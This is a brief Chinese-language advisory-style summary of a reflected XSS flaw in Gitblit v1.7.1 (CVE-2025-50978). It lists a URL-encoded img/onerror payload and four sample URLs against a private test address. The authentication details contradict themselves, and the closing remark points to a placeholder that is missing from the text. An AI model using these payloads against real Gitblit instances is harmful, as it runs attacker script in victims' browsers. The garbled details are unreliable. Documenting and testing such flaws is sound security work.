关键信息 CVE编号: CVE-2025-50978 漏洞类型: 反射型跨站脚本(XSS)通过路径 受影响版本: Gitblit v1.7.1 描述: 在Gitblit v1.7.1中,由于对文件名元素的输入验证不足,存在反射型XSS漏洞。攻击者可以通过注入特殊构造的payload(如"%22>"),在受害者查看被操纵的URL时执行任意JavaScript代码。 认证要求: 是的,可能无需认证 用户角色: 管理员 Payload示例: %22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e 测试用URL示例: - http://172.18.0.34/log/.git/master%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e - http://172.18.0.34/history/.git/mastery%3cimg%20src%3da%20onerror%3dalert(1)%3e - http://172.18.0.34/blob/.git/master/README.md%3cimg%20src%3da%20onerror%3dalert(1)%3e - http://172.18.0.34/blame/.git/master/README.md%3cimg%20src%3da%20onerror%3dalert(1)%3e?star=true 备注: 需要将替换为实际存在的仓库名称。